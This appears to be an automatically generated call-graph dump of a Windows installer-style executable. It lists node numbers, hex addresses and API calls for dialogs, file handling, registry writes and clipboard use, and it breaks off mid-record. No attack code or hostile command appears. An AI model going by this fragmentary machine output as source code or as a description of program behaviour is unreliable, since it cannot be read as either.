405846 3940 4059f0 3939->3940 3941 405867 GetDlgItem GetDlgItem GetDlgItem 3939->3941 3943 405a21 3940->3943 3944 4059f9 GetDlgItem CreateThread FindCloseChangeNotification 3940->3944 3984 404636 SendMessageW 3941->3984 3946 405a71 3943->3946 3947 405a38 ShowWindow ShowWindow 3943->3947 3948 405a4c 3943->3948 3944->3943 3987 4057da 5 API calls 3944->3987 3945 4058d7 3950 4058de GetClientRect GetSystemMetrics SendMessageW SendMessageW 3945->3950 3954 404668 8 API calls 3946->3954 3986 404636 SendMessageW 3947->3986 3949 405aac 3948->3949 3952 405a60 3948->3952 3953 405a86 ShowWindow 3948->3953 3949->3946 3957 405aba SendMessageW 3949->3957 3955 405930 SendMessageW SendMessageW 3950->3955 3956 40594c 3950->3956 3958 4045da SendMessageW 3952->3958 3960 405aa6 3953->3960 3961 405a98 3953->3961 3959 405a7f 3954->3959 3955->3956 3962 405951 SendMessageW 3956->3962 3963 40595f 3956->3963 3957->3959 3964 405ad3 CreatePopupMenu 3957->3964 3958->3946 3966 4045da SendMessageW 3960->3966 3965 405707 28 API calls 3961->3965 3962->3963 3968 404601 22 API calls 3963->3968 3967 4066bf 21 API calls 3964->3967 3965->3960 3966->3949 3969 405ae3 AppendMenuW 3967->3969 3970 40596f 3968->3970 3971 405b00 GetWindowRect 3969->3971 3972 405b13 TrackPopupMenu 3969->3972 3973 405978 ShowWindow 3970->3973 3974 4059ac GetDlgItem SendMessageW 3970->3974 3971->3972 3972->3959 3975 405b2e 3972->3975 3976 40599b 3973->3976 3977 40598e ShowWindow 3973->3977 3974->3959 3978 4059d3 SendMessageW SendMessageW 3974->3978 3979 405b4a SendMessageW 3975->3979 3985 404636 SendMessageW 3976->3985 3977->3976 3978->3959 3979->3979 3980 405b67 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3979->3980 3982 405b8c SendMessageW 3980->3982 3982->3982 3983 405bb5 GlobalUnlock SetClipboardData CloseClipboard 3982->3983 3983->3959 3984->3945 3985->3974 3986->3948 4106 404e48 4107 404e74 4106->4107 4108 404e58 4106->4108 4110 404ea7 4107->4110 4111 404e7a SHGetPathFromIDListW 4107->4111 4117 405cc6 GetDlgItemTextW 4108->4117 4113 404e91 SendMessageW 4111->4113 4114 404e8a 4111->4114 4112 404e65 SendMessageW 4112->4107 4113->4110 4115 40140b 2 API calls 4114->4115 4115->4113 4117->4112 4118 401c48 4119 402d89 21 API calls 4118->4119 4120 401c4f 4119->4120 4121 402d89 21 API calls 4120->4121 4122 401c5c 4121->4122 4123 401c71 4122->4123 4124 402dab 21 API calls 4122->4124 4125 401c81 4123->4125 4126 402dab 21 API calls 4123->4126 4124->4123 4127 401cd8 4125->4127 4128 401c8c 4125->4128 4126->4125 4129 402dab 21 API calls 4127->4129 4130 402d89 21 API calls 4128->4130 4131 401cdd 4129->4131 4132 401c91 4130->4132 4134 402dab 21 API calls 4131->4134 4133 402d89 21 API calls 4132->4133 4135 401c9d 4133->4135 4136 401ce6 FindWindowExW 4134->4136 4137 401cc8 SendMessageW 4135->4137 4138 401caa SendMessageTimeoutW 4135->4138 4139 401d08 4136->4139 4137->4139 4138->4139 4140 4028c9 4141 4028cf 4140->4141 4142 4028d7 FindClose 4141->4142 4143 402c2f 4141->4143 4142->4143 4147 4016d1 4148 402dab 21 API calls 4147->4148 4149 4016d7 GetFullPathNameW 4148->4149 4150 4016f1 4149->4150 4156 401713 4149->4156 4152 4069df 2 API calls 4150->4152 4150->4156 4151 401728 GetShortPathNameW 4153 402c2f 4151->4153 4154 401703 4152->4154 4154->4156 4157 406682 lstrcpynW 4154->4157 4156->4151 4156->4153 4157->4156 3390 401e53 GetDC 3398 402d89 3390->3398 3392 401e65 GetDeviceCaps MulDiv ReleaseDC 3393 402d89 21 API calls 3392->3393 3394 401e96 3393->3394 3395 4066bf 21 API calls 3394->3395 3396 401ed3 CreateFontIndirectW 3395->3396 3397 40263d 3396->3397 3399 4066bf 21 API calls 3398->3399 3400 402d9e 3399->3400 3400->3392 4158 402955 4159 402dab 21 API calls 4158->4159 4160 402961 4159->4160 4161 402977 4160->4161 4162 402dab 21 API calls 4160->4162 4163 40614d 2 API calls 4161->4163 4162->4161 4164 40297d 4163->4164 4186 406172 GetFileAttributesW CreateFileW 4164->4186 4166 40298a 4167 402a40 4166->4167 4168 4029a5 GlobalAlloc 4166->4168 4169 402a28 4166->4169 4170 402a47 DeleteFileW 4167->4170 4171 402a5a 4167->4171 4168->4169 4172 4029be 4168->4172 4173 403376 48 API calls 4169->4173 4170->4171 4187 4035fd SetFilePointer 4172->4187 4175 402a35 CloseHandle 4173->4175 4175->4167 4176 4029c4 4177 4035e7 ReadFile 4176->4177 4178 4029cd GlobalAlloc 4177->4178 4179 402a11 4178->4179 4180 4029dd 4178->4180 4181 406224 WriteFile 4179->4181 4182 403376 48 API calls 4180->4182 4183 402a1d GlobalFree 4181->4183 4185 4029ea 4182->4185 4183->4169 4184 402a08 GlobalFree 4184->4179 4185->4184 4186->4166 4187->4176 4202 4014d7 4203 402d89 21 API calls 4202->4203 4204 4014dd Sleep 4203->4204 4206 402c2f 4204->4206 4207 40195b 4208 402dab 21 API calls 4207->4208 4209 401962 lstrlenW 4208->4209 4210 40263d 4209->4210 4218 4020dd 4219 4020ef 4218->4219 4220 4021a1 4218->4220 4221 402dab 21 API calls 4219->4221 4222 401423 28 API calls 4220->4222 4223 4020f6 4221->4223 4228 4022fb 4222->4228 4224 402dab 21 API calls 4223->4224 4225 4020ff 4224->4225 4226 402115 LoadLibraryExW 4225->4226 4227 402107 GetModuleHandleW 4225->4227 4226->4220 4229 402126 4226->4229 4227->4226 4227->4229 4238 406ae5 4229->4238 4232 402170 4234 405707 28 API calls 4232->4234 4233 402137 4235 401423 28 API calls 4233->4235 4236 402147 4233->4236 4234->4236 4235->4236 4236->4228 4237 402193 FreeLibrary 4236->4237 4237->4228 4243 4066a4 WideCharToMultiByte 4238->4243 4240 406b02 4241 406b09 GetProcAddress 4240->4241 4242 402131 4240->4242 4241->4242 4242->4232 4242->4233 4243->4240 4244 402b5e 4245 402bb0 4244->4245 4246 402b65 4244->4246 4247 406a76 5 API calls 4245->4247 4249 402d89 21 API calls 4246->4249 4250 402bae 4246->4250 4248 402bb7 4247->4248 4251 402dab 21 API calls 4248->4251 4252 402b73 4249->4252 4253 402bc0 4251->4253 4254 402d89 21 API calls 4252->4254 4253->4250 4255 402bc4 IIDFromString 4253->4255 4257 402b7f 4254->4257 4255->4250 4256 402bd3 4255->4256 4256->4250 4262 406682 lstrcpynW 4256->4262 4261 4065c9 wsprintfW 4257->4261 4259 402bf0 CoTaskMemFree 4259->4250 4261->4250 4262->4259 4263 402a60 4264 402d89 21 API calls 4263->4264 4265 402a66 4264->4265 4266 402aa9 4265->4266 4267 402a8d 4265->4267 4275 402933 4265->4275 4268 402ac3 4266->4268 4269 402ab3 4266->4269 4270 402a92 4267->4270 4271 402aa3 4267->4271 4273 4066bf 21 API calls 4268->4273 4272 402d89 21 API calls 4269->4272 4277 406682 lstrcpynW 4270->4277 4271->4275 4278 4065c9 wsprintfW 4271->4278 4272->4271 4273->4271 4277->4275 4278->4275 4279 401761 4280 402dab 21 API calls 4279->4280 4281 401768 4280->4281 4282 4061a1 2 API calls 4281->4282 4283 40176f 4282->4283 4283->4283 4284 401d62 4285 402d89 21 API calls 4284->4285 4286 401d73 SetWindowLongW 4285->4286 4287 402c2f 4286->4287 4288 4028e3 4289 4028eb 4288->4289 4290 4028ef FindNextFileW 4289->4290 4292 402901 4289->4292 4291 402948 4290->4291 4290->4292 4294 406682 lstrcpynW 4291->4294 4294->4292 4295 401568 4296 402ba9 4295->4296 4299 4065c9 wsprintfW 4296->4299 4298 402bae 4299->4298 4307 40196d 4308 402d89 21 API calls 4307->4308 4309 401974 4308->4309 4310 402d89 21 API calls 4309->4310 4311 401981 4310->4311 4312 402dab 21 API calls 4311->4312 4313 401998 lstrlenW 4312->4313 4315 4019a9 4313->4315 4314 4019ea 4315->4314 4319 406682 lstrcpynW 4315->4319 4317 4019da 4317->4314 4318 4019df lstrlenW 4317->4318 4318->4314 4319->4317 4320 40506e GetDlgItem GetDlgItem 4321 4050c0 7 API calls 4320->4321 4333 4052e5 4320->4333 4322 405167 DeleteObject 4321->4322 4323 40515a SendMessageW 4321->4323 4324 405170 4322->4324 4323->4322 4326 4051a7 4324->4326 4328 4066bf 21 API calls 4324->4328 4325 4053c7 4327 405473 4325->4327 4336 405420 SendMessageW 4325->4336 4359 4052d8 4325->4359 4329 404601 22 API calls 4326->4329 4331 405485 4327->4331 4332 40547d SendMessageW 4327->4332 4334 405189 SendMessageW SendMessageW 4328->4334 4330 4051bb 4329->4330 4335 404601 22 API calls 4330->4335 4339 4054ae 4331->4339 4345 405497 ImageList_Destroy 4331->4345 4346 40549e 4331->4346 4332->4331 4333->4325 4363 405354 4333->4363 4374 404fbc SendMessageW 4333->4374 4334->4324 4341 4051cc 4335->4341 4343 405435 SendMessageW 4336->4343 4336->4359 4337 4053b9 SendMessageW 4337->4325 4338 404668 8 API calls 4344 405674 4338->4344 4342 405628 4339->4342 4367 4054e9 4339->4367 4379 40503c 4339->4379 4348 4052a7 GetWindowLongW SetWindowLongW 4341->4348 4355 40521f SendMessageW 4341->4355 4357 4052a2 4341->4357 4360 405271 SendMessageW 4341->4360 4361 40525d SendMessageW 4341->4361 4349 40563a ShowWindow GetDlgItem ShowWindow 4342->4349 4342->4359 4351 405448 4343->4351 4345->4346 4346->4339 4347 4054a7 GlobalFree 4346->4347 4347->4339 4350 4052c0 4348->4350 4349->4359 4352 4052c5 ShowWindow 4350->4352 4353 4052dd 4350->4353 4356 405459 SendMessageW 4351->4356 4372 404636 SendMessageW 4352->4372 4373 404636 SendMessageW 4353->4373 4355->4341 4356->4327 4357->4348 4357->4350 4359->4338 4360->4341 4361->4341 4363->4325 4363->4337 4364 4055f3 4365 4055fe InvalidateRect 4364->4365 4368 40560a 4364->4368 4365->4368 4366 405517 SendMessageW 4371 40552d 4366->4371 4367->4366 4367->4371 4368->4342 4388 404f77 4368->4388 4370 4055a1 SendMessageW SendMessageW 4370->4371 4371->4364 4371->4370 4372->4359 4373->4333 4375 40501b SendMessageW 4374->4375 4376 404fdf GetMessagePos ScreenToClient SendMessageW 4374->4376 4377 405013 4375->4377 4376->4377 4378 405018 4376->4378 4377->4363 4378->4375 4391 406682 lstrcpynW 4379->4391 4381 40504f 4392 4065c9 wsprintfW 4381->4392 4383 405059 4384 40140b 2 API calls 4383->4384 4385 405062 4384->4385 4393 406682 lstrcpynW 4385->4393 4387 405069 4387->4367 4394 404eae 4388->4394 4390 404f8c 4390->4342 4391->4381 4392->4383 4393->4387 4395 404ec7 4394->4395 4396 4066bf 21 API calls 4395->4396 4397 404f2b 4396->4397 4398 4066bf 21 API calls 4397->4398 4399 404f36 4398->4399 4400 4066bf 21 API calls 4399->4400 4401 404f4c lstrlenW wsprintfW SetDlgItemTextW 4400->4401 4401->4390 4402 40166f 4403 402dab 21 API calls 4402->4403 4404 401675 4403->4404 4405 4069df 2 API calls 4404->4405 4406 40167b 4405->4406 4407 402af0 4408 402d89 21 API calls 4407->4408 4409 402af6 4408->4409 4410 402933 4409->4410 4411 4066bf 21 API calls 4409->4411 4411->4410 4412 404771 lstrlenW 4413 404790 4412->4413 4414 404792 WideCharToMultiByte 4412->4414 4413->4414 4415 4026f1 4416 402d89 21 API calls 4415->4416 4424 402700 4416->4424 4417 40283d 4418 40274a ReadFile 4418->4417 4418->4424 4419 4061f5 ReadFile 4419->4424 4420 40278a MultiByteToWideChar 4420->4424 4421 40283f 4428 4065c9 wsprintfW 4421->4428 4422 406253 5 API calls 4422->4424 4424->4417 4424->4418 4424->4419 4424->4420 4424->4421 4424->4422 4425 4027b0 SetFilePointer MultiByteToWideChar 4424->4425 4426 402850 4424->4426 4425->4424 4426->4417 4427 402871 SetFilePointer 4426->4427 4427->4417 4428->4417 4429 404af2 4430 404b1e 4429->4430 4431 404b2f 4429->4431 4490 405cc6 GetDlgItemTextW 4430->4490 4433 404b3b GetDlgItem 4431->4433 4439 404b9a 4431->4439 4435 404b4f 4433->4435 4434 404b29 4437 406930 5 API calls 4434->4437 4438 404b63 SetWindowTextW 4435->4438 4443 405ffc 4 API calls 4435->4443 4436 404c7e 4440 404e2d 4436->4440 4492 405cc6 GetDlgItemTextW 4436->4492 4437->4431 4444 404601 22 API calls 4438->4444 4439->4436 4439->4440 4445 4066bf 21 API calls 4439->4445 4442 404668 8 API calls 4440->4442 4450 404e41 4442->4450 4451 404b59 4443->4451 4447 404b7f 4444->4447 4448 404c0e SHBrowseForFolderW 4445->4448 4446 404cae 4449 406059 18 API calls 4446->4449 4452 404601 22 API calls 4447->4452 4448->4436 4453 404c26 CoTaskMemFree 4448->4453 4454 404cb4 4449->4454 4451->4438 4457 405f51 3 API calls 4451->4457 4455 404b8d 4452->4455 4456 405f51 3 API calls 4453->4456 4493 406682 lstrcpynW 4454->4493 4491 404636 SendMessageW 4455->4491 4459 404c33 4456->4459 4457->4438 4462 404c6a SetDlgItemTextW 4459->4462 4466 4066bf 21 API calls 4459->4466 4461 404b93 4464 406a76 5 API calls 4461->4464 4462->4436 4463 404ccb 4465 406a76 5 API calls 4463->4465 4464->4439 4473 404cd2 4465->4473 4467 404c52 lstrcmpiW 4466->4467 4467->4462 4470 404c63 lstrcatW 4467->4470 4468 404d13 4494 406682 lstrcpynW 4468->4494 4470->4462 4471 404d1a 4472 405ffc 4 API calls 4471->4472 4474 404d20 GetDiskFreeSpaceW 4472->4474 4473->4468 4477 405f9d 2 API calls 4473->4477 4479 404d6b 4473->4479 4476 404d44 MulDiv 4474->4476 4474->4479 4476->4479 4477->4473 4478 404ddc 4481 404dff 4478->4481 4483 40140b 2 API calls 4478->4483 4479->4478 4480 404f77 24 API calls 4479->4480 4482 404dc9 4480->4482 4495 404623 KiUserCallbackDispatcher 4481->4495 4485 404dde SetDlgItemTextW 4482->4485 4486 404dce 4482->4486 4483->4481 4485->4478 4488 404eae 24 API calls 4486->4488 4487 404e1b 4487->4440 4489 404a4b SendMessageW 4487->4489 4488->4478 4489->4440 4490->4434 4491->4461 4492->4446 4493->4463 4494->4471 4495->4487 3424 401774 3425 402dab 21 API calls 3424->3425 3426 40177b 3425->3426 3427 4017a3 3426->3427 3428 40179b 3426->3428 3493 406682 lstrcpynW 3427->3493 3492 406682 lstrcpynW 3428->3492 3431 4017a1 3435 406930 5 API calls 3431->3435 3432 4017ae 3494 405f51 lstrlenW CharPrevW 3432->3494 3449 4017c0 3435->3449 3439 4017d2 CompareFileTime 3439->3449 3440 401892 3466 405707 3440->3466 3442 405707 28 API calls 3445 40187e 3442->3445 3443 406682 lstrcpynW 3443->3449 3448 4018c3 SetFileTime 3450 4018d5 FindCloseChangeNotification 3448->3450 3449->3439 3449->3440 3449->3443 3451 4066bf 21 API calls 3449->3451 3460 401869 3449->3460 3462 40614d GetFileAttributesW 3449->3462 3465 406172 GetFileAttributesW CreateFileW 3449->3465 3497 4069df FindFirstFileW 3449->3497 3500 405ce2 3449->3500 3450->3445 3452 4018e6 3450->3452 3451->3449 3453 4018eb 3452->3453 3454 4018fe 3452->3454 3455 4066bf 21 API calls 3453->3455 3456 4066bf 21 API calls 3454->3456 3458 4018f3 lstrcatW 3455->3458 3459 401906 3456->3459 3458->3459 3461 405ce2 MessageBoxIndirectW 3459->3461 3460->3442 3460->3445 3461->3445 3463 40616c 3462->3463 3464 40615f SetFileAttributesW 3462->3464 3463->3449 3464->3463 3465->3449 3467 405722 3466->3467 3476 40189c 3466->3476 3468 40573e lstrlenW 3467->3468 3469 4066bf 21 API calls 3467->3469 3470 405767 3468->3470 3471 40574c lstrlenW 3468->3471 3469->3468 3473 40577a 3470->3473 3474 40576d SetWindowTextW 3470->3474 3472 40575e lstrcatW 3471->3472 3471->3476 3472->3470 3475 405780 SendMessageW SendMessageW SendMessageW 3473->3475 3473->3476 3474->3473 3475->3476 3477 403376 3476->3477 3478 4033a1 3477->3478 3479 403385 SetFilePointer 3477->3479 3504 40347e GetTickCount 3478->3504 3479->3478 3482 4018af 3482->3448 3482->3450 3485 40347e 46 API calls 3486 4033d8 3485->3486 3486->3482 3487 403444 ReadFile 3486->3487 3489 4033e7 3486->3489 3487->3482 3489->3482 3490 4061f5 ReadFile 3489->3490 3519 406224 WriteFile 3489->3519 3490->3489 3492->3431 3493->3432 3495 4017b4 lstrcatW 3494->3495 3496 405f6d lstrcatW 3494->3496 3495->3431 3496->3495 3498 406a00 3497->3498 3499 4069f5 FindClose 3497->3499 3498->3449 3499->3498 3501 405cf7 3500->3501 3502 405d43 3501->3502 3503 405d0b MessageBoxIndirectW 3501->3503 3502->3449 3503->3502 3505 4035d6 3504->3505 3506 4034ac 3504->3506 3508 403033 36 API calls 3505->3508 3521 4035fd SetFilePointer 3506->3521 3509 4033a8 3508->3509 3509->3482 3517 4061f5 ReadFile 3509->3517 3510 4034b7 SetFilePointer 3515 4034dc 3510->3515 3514 406224 WriteFile 3514->3515 3515->3509 3515->3514 3516 4035b7 SetFilePointer 3515->3516 3522 4035e7 3515->3522 3525 406bf1 3515->3525 3532 403033 3515->3532 3516->3505 3518 4033c1 3517->3518 3518->3482 3518->3485 3520 406242 3519->3520 3520->3489 3521->3510 3523 4061f5 ReadFile 3522->3523 3524 4035fa 3523->3524 3524->3515 3526 406c16 3525->3526 3527 406c1e 3525->3527 3526->3515 3527->3526 3528 406ca5 GlobalFree 3527->3528 3529 406cae GlobalAlloc 3527->3529 3530 406d25 GlobalAlloc 3527->3530 3531 406d1c GlobalFree 3527->3531 3528->3529 3529->3526 3529->3527 3530->3526 3530->3527 3531->3530 3533 403044 3532->3533 3534 40305c 3532->3534 3535 40304d DestroyWindow 3533->3535 3538 403054 3533->3538 3536 403064 3534->3536 3537 40306c GetTickCount 3534->3537 3535->3538 3547 406ab2 3536->3547 3537->3538 3539 40307a 3537->3539 3538->3515 3541 403082 3539->3541 3542 4030af CreateDialogParamW ShowWindow 3539->3542 3541->3538 3551 403017 3541->3551 3542->3538 3544 403090 wsprintfW 3545 405707 28 API calls 3544->3545 3546 4030ad 3545->3546 3546->3538 3548 406acf PeekMessageW 3547->3548 3549 406ac5 DispatchMessageW 3548->3549 3550 406adf 3548->3550 3549->3548 3550->3538 3552 403026 3551->3552 3553 403028 MulDiv 3551->3553 3552->3553 3553->3544 4496 4014f5 SetForegroundWindow 4497 402c2f 4496->4497 4498 401a77 4499 402d89 21 API calls 4498->4499 4500 401a80 4499->4500 4501 402d89 21 API calls 4500->4501 4502 401a25 4501->4502 4503 401578 4504 401591 4503->4504 4505 401588 ShowWindow 4503->4505 4506 402c2f 4504->4506 4507 40159f ShowWindow 4504->4507 4505->4504 4507->4506 3998 4023f9 3999 402dab 21 API calls 3998->3999 4000 402408 3999->4000 4001 402dab 21 API calls 4000->4001 4002 402411 4001->4002 4003 402dab 21 API calls 4002->4003 4004 40241b GetPrivateProfileStringW 4003->4004 4508 40567b 4509 40568b 4508->4509 4510 40569f 4508->4510 4512 405691 4509->4512 4513 4056e8 4509->4513 4511 4056a7 IsWindowVisible 4510->4511 4519 4056be 4510->4519 4511->4513 4514 4056b4 4511->4514 4516 40464d SendMessageW 4512->4516 4515 4056ed CallWindowProcW 4513->4515 4517 404fbc 5 API calls 4514->4517 4518 40569b 4515->4518 4516->4518 4517->4519 4519->4515 4520 40503c 4 API calls 4519->4520 4520->4513 4521 401ffb 4522 402dab 21 API calls 4521->4522 4523 402002 4522->4523 4524 4069df 2 API calls 4523->4524 4525 402008 4524->4525 4527 402019 4525->4527 4528 4065c9 wsprintfW 4525->4528 4528->4527 4529 401b7c 4530 402dab 21 API calls 4529->4530 4531 401b83 4530->4531 4532 402d89 21 API calls 4531->4532 4533 401b8c wsprintfW 4532->4533 4534 402c2f 4533->4534 4535 401000 4536 401037 BeginPaint GetClientRect 4535->4536 4537 40100c DefWindowProcW 4535->4537 4539 4010f3 4536->4539 4540 401179 4537->4540 4541 401073 CreateBrushIndirect FillRect DeleteObject 4539->4541 4542 4010fc 4539->4542 4541->4539 4543 401102 CreateFontIndirectW 4542->4543 4544 401167 EndPaint 4542->4544 4543->4544 4545 401112 6 API calls 4543->4545 4544->4540 4545->4544 4546 401680 4547 402dab 21 API calls 4546->4547 4548 401687 4547->4548 4549 402dab 21 API calls 4548->4549 4550 401690 4549->4550 4551 402dab 21 API calls 4550->4551 4552 401699 MoveFileW 4551->4552 4553 4016a5 4552->4553 4554 4016ac 4552->4554 4556 401423 28 API calls 4553->4556 4555 4069df 2 API calls 4554->4555 4558 4022fb 4554->4558 4557 4016bb 4555->4557 4556->4558 4557->4558 4559 406442 40 API calls 4557->4559 4559->4553 3230 404102 3231 40411a 3230->3231 3232 40427b 3230->3232 3231->3232 3233 404126 3231->3233 3234 4042cc 3232->3234 3235 40428c GetDlgItem GetDlgItem 3232->3235 3237 404131 SetWindowPos 3233->3237 3238 404144 3233->3238 3236 404326 3234->3236 3244 401389 2 API calls 3234->3244 3239 404601 22 API calls 3235->3239 3257 404276 3236->3257 3303 40464d 3236->3303 3237->3238 3241 40414d ShowWindow 3238->3241 3242 40418f 3238->3242 3243 4042b6 SetClassLongW 3239->3243 3245 404268 3241->3245 3246 40416d GetWindowLongW 3241->3246 3247 404197 DestroyWindow 3242->3247 3248 4041ae 3242->3248 3249 40140b 2 API calls 3243->3249 3252 4042fe 3244->3252 3342 404668 3245->3342 3246->3245 3254 404186 ShowWindow 3246->3254 3302 40458a 3247->3302 3250 4041b3 SetWindowLongW 3248->3250 3251 4041c4 3248->3251 3249->3234 3250->3257 3251->3245 3255 4041d0 GetDlgItem 3251->3255 3252->3236 3256 404302 SendMessageW 3252->3256 3254->3242 3260 4041e1 SendMessageW IsWindowEnabled 3255->3260 3261 4041fe 3255->3261 3256->3257 3258 40140b 2 API calls 3269 404338 3258->3269 3259 40458c DestroyWindow EndDialog 3259->3302 3260->3257 3260->3261 3264 40420b 3261->3264 3266 404252 SendMessageW 3261->3266 3267 40421e 3261->3267 3276 404203 3261->3276 3262 4045bb ShowWindow 3262->3257 3264->3266 3264->3276 3266->3245 3270 404226 3267->3270 3271 40423b 3267->3271 3268 404239 3268->3245 3269->3257 3269->3258 3269->3259 3272 404601 22 API calls 3269->3272 3293 4044cc DestroyWindow 3269->3293 3306 4066bf 3269->3306 3323 404601 3269->3323 3336 40140b 3270->3336 3273 40140b 2 API calls 3271->3273 3272->3269 3275 404242 3273->3275 3275->3245 3275->3276 3339 4045da 3276->3339 3278 4043b3 GetDlgItem 3279 4043d0 ShowWindow KiUserCallbackDispatcher 3278->3279 3280 4043c8 3278->3280 3326 404623 KiUserCallbackDispatcher 3279->3326 3280->3279 3282 4043fa EnableWindow 3287 40440e 3282->3287 3283 404413 GetSystemMenu EnableMenuItem SendMessageW 3284 404443 SendMessageW 3283->3284 3283->3287 3284->3287 3287->3283 3327 404636 SendMessageW 3287->3327 3328 4040e3 3287->3328 3331 406682 lstrcpynW 3287->3331 3289 404472 lstrlenW 3290 4066bf 21 API calls 3289->3290 3291 404488 SetWindowTextW 3290->3291 3332 401389 3291->3332 3294 4044e6 CreateDialogParamW 3293->3294 3293->3302 3295 404519 3294->3295 3294->3302 3296 404601 22 API calls 3295->3296 3297 404524 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3296->3297 3298 401389 2 API calls 3297->3298 3299 40456a 3298->3299 3299->3257 3300 404572 ShowWindow 3299->3300 3301 40464d SendMessageW 3300->3301 3301->3302 3302->3257 3302->3262 3304 404665 3303->3304 3305 404656 SendMessageW 3303->3305 3304->3269 3305->3304 3321 4066ca 3306->3321 3307 406911 3308 40692a 3307->3308 3378 406682 lstrcpynW 3307->3378 3308->3269 3310 4068e2 lstrlenW 3310->3321 3314 4067db GetSystemDirectoryW 3314->3321 3315 4066bf 15 API calls 3315->3310 3316 4067f1 GetWindowsDirectoryW 3316->3321 3318 4066bf 15 API calls 3318->3321 3319 406883 lstrcatW 3319->3321 3321->3307 3321->3310 3321->3314 3321->3315 3321->3316 3321->3318 3321->3319 3322 406853 SHGetPathFromIDListW CoTaskMemFree 3321->3322 3356 406a76 GetModuleHandleA 3321->3356 3362 406550 3321->3362 3367 406930 3321->3367 3376 4065c9 wsprintfW 3321->3376 3377 406682 lstrcpynW 3321->3377 3322->3321 3324 4066bf 21 API calls 3323->3324 3325 40460c SetDlgItemTextW 3324->3325 3325->3278 3326->3282 3327->3287 3329 4066bf 21 API calls 3328->3329 3330 4040f1 SetWindowTextW 3329->3330 3330->3287 3331->3289 3334 401390 3332->3334 3333 4013fe 3333->3269 3334->3333 3335 4013cb MulDiv SendMessageW 3334->3335 3335->3334 3337 401389 2 API calls 3336->3337 3338 401420 3337->3338 3338->3276 3340 4045e1 3339->3340 3341 4045e7 SendMessageW 3339->3341 3340->3341 3341->3268 3343 40472b 3342->3343 3344 404680 GetWindowLongW 3342->3344 3343->3257 3344->3343 3345 404695 3344->3345 3345->3343 3346 4046c2 GetSysColor 3345->3346 3347 4046c5 3345->3347 3346->3347 3348 4046d5 SetBkMode 3347->3348 3349 4046cb SetTextColor 3347->3349 3350 4046f3 3348->3350 3351 4046ed GetSysColor 3348->3351 3349->3348 3352 4046fa SetBkColor 3350->3352 3353 404704 3350->3353 3351->3350 3352->3353 3353->3343 3354 404717 DeleteObject 3353->3354 3355 40471e CreateBrushIndirect 3353->3355 3354->3355 3355->3343 3357 406a92 3356->3357 3358 406a9c GetProcAddress 3356->3358 3379 406a06 GetSystemDirectoryW 3357->3379 3360 406aab 3358->3360 3360->3321 3361 406a98 3361->3358 3361->3360 3382 4064ef 3362->3382 3365 4065b4 3365->3321 3366 406584 RegQueryValueExW RegCloseKey 3366->3365 3368 40693d 3367->3368 3370 4069a6 CharNextW 3368->3370 3371 4069b3 3368->3371 3374 406992 CharNextW 3368->3374 3375 4069a1 CharNextW 3368->3375 3386 405f7e 3368->3386 3369 4069b8 CharPrevW 3369->3371 3370->3368 3370->3371 3371->3369 3372 4069d9 3371->3372 3372->3321 3374->3368 3375->3370 3376->3321 3377->3321 3378->3308 3380 406a28 wsprintfW LoadLibraryExW 3379->3380 3380->3361 3383 4064fe 3382->3383 3384 406502 3383->3384 3385 406507 RegOpenKeyExW 3383->3385 3384->3365 3384->3366 3385->3384 3387 405f84 3386->3387 3388 405f9a 3387->3388 3389 405f8b CharNextW 3387->3389 3388->3368 3389->3387 4560 401503 4561 401508 4560->4561 4563 401520 4560->4563 4562 402d89 21 API calls 4561->4562 4562->4563 4564 401a04 4565 402dab 21 API calls 4564->4565 4566 401a0b 4565->4566 4567 402dab 21 API calls 4566->4567 4568 401a14 4567->4568 4569 401a1b lstrcmpiW 4568->4569 4570 401a2d lstrcmpW 4568->4570 4571 401a21 4569->4571 4570->4571 4572 402304 4573 402dab 21 API calls 4572->4573 4574 40230a 4573->4574 4575 402dab 21 API calls 4574->4575 4576 402313 4575->4576 4577 402dab 21 API calls 4576->4577 4578 40231c 4577->4578 4579 4069df 2 API calls 4578->4579 4580 402325 4579->4580 4581 402336 lstrlenW lstrlenW 4580->4581 4585 402329 4580->4585 4583 405707 28 API calls 4581->4583 4582 405707 28 API calls 4586 402331 4582->4586 4584 402374 SHFileOperationW 4583->4584 4584->4585 4584->4586 4585->4582 4585->4586 4594 401d86 4595 401d99 GetDlgItem 4594->4595 4596 401d8c 4594->4596 4598 401d93 4595->4598 4597 402d89 21 API calls 4596->4597 4597->4598 4599 401dda GetClientRect LoadImageW SendMessageW 4598->4599 4600 402dab 21 API calls 4598->4600 4602 401e38 4599->4602 4604 401e44 4599->4604 4600->4599 4603 401e3d DeleteObject 4602->4603 4602->4604 4603->4604 4605 402388 4606 40238f 4605->4606 4609 4023a2 4605->4609 4607 4066bf 21 API calls 4606->4607 4608 40239c 4607->4608 4610 405ce2 MessageBoxIndirectW 4608->4610 4610->4609 4611 402c0a SendMessageW 4612 402c24 InvalidateRect 4611->4612 4613 402c2f 4611->4613 4612->4613 4614 40248f 4615 402dab 21 API calls 4614->4615 4616 4024a1 4615->4616 4617 402dab 21 API calls 4616->4617 4618 4024ab 4617->4618 4631 402e3b 4618->4631 4621 4024e3 4624 4024ef 4621->4624 4625 402d89 21 API calls 4621->4625 4622 402933 4623 402dab 21 API calls 4627 4024d9 lstrlenW 4623->4627 4626 40250e RegSetValueExW 4624->4626 4628 403376 48 API calls 4624->4628 4625->4624 4629 402524 RegCloseKey 4626->4629 4627->4621 4628->4626 4629->4622 4632 402e56 4631->4632 4635 40651d 4632->4635 4636 40652c 4635->4636 4637 4024bb 4636->4637 4638 406537 RegCreateKeyExW 4636->4638 4637->4621 4637->4622 4637->4623 4638->4637 4639 402910 4640 402dab 21 API calls 4639->4640 4641 402917 FindFirstFileW 4640->4641 4642 40292a 4641->4642 4643 40293f 4641->4643 4647 4065c9 wsprintfW 4643->4647 4645 402948 4648 406682 lstrcpynW 4645->4648 4647->4645 4648->4642 4649 401911 4650 401948 4649->4650 4651 402dab 21 API calls 4650->4651 4652 40194d 4651->4652 4653 405d8e 71 API calls 4652->4653 4654 401956 4653->4654 4655 401491 4656 405707 28 API calls 4655->4656 4657 401498 4656->4657 4658 403d12 4659 403d1d 4658->4659 4660 403d21 4659->4660 4661 403d24 GlobalAlloc 4659->4661 4661->4660 4669 401914 4670 402dab 21 API calls 4669->4670 4671 40191b 4670->4671 4672 405ce2 MessageBoxIndirectW 4671->4672 4673 401924 4672->4673 4674 402896 4675 40289d 4674->4675 4676 402bae 4674->4676 4677 402d89 21 API calls 4675->4677 4678 4028a4 4677->4678 4679 4028b3 SetFilePointer 4678->4679 4679->4676 4680 4028c3 4679->4680 4682 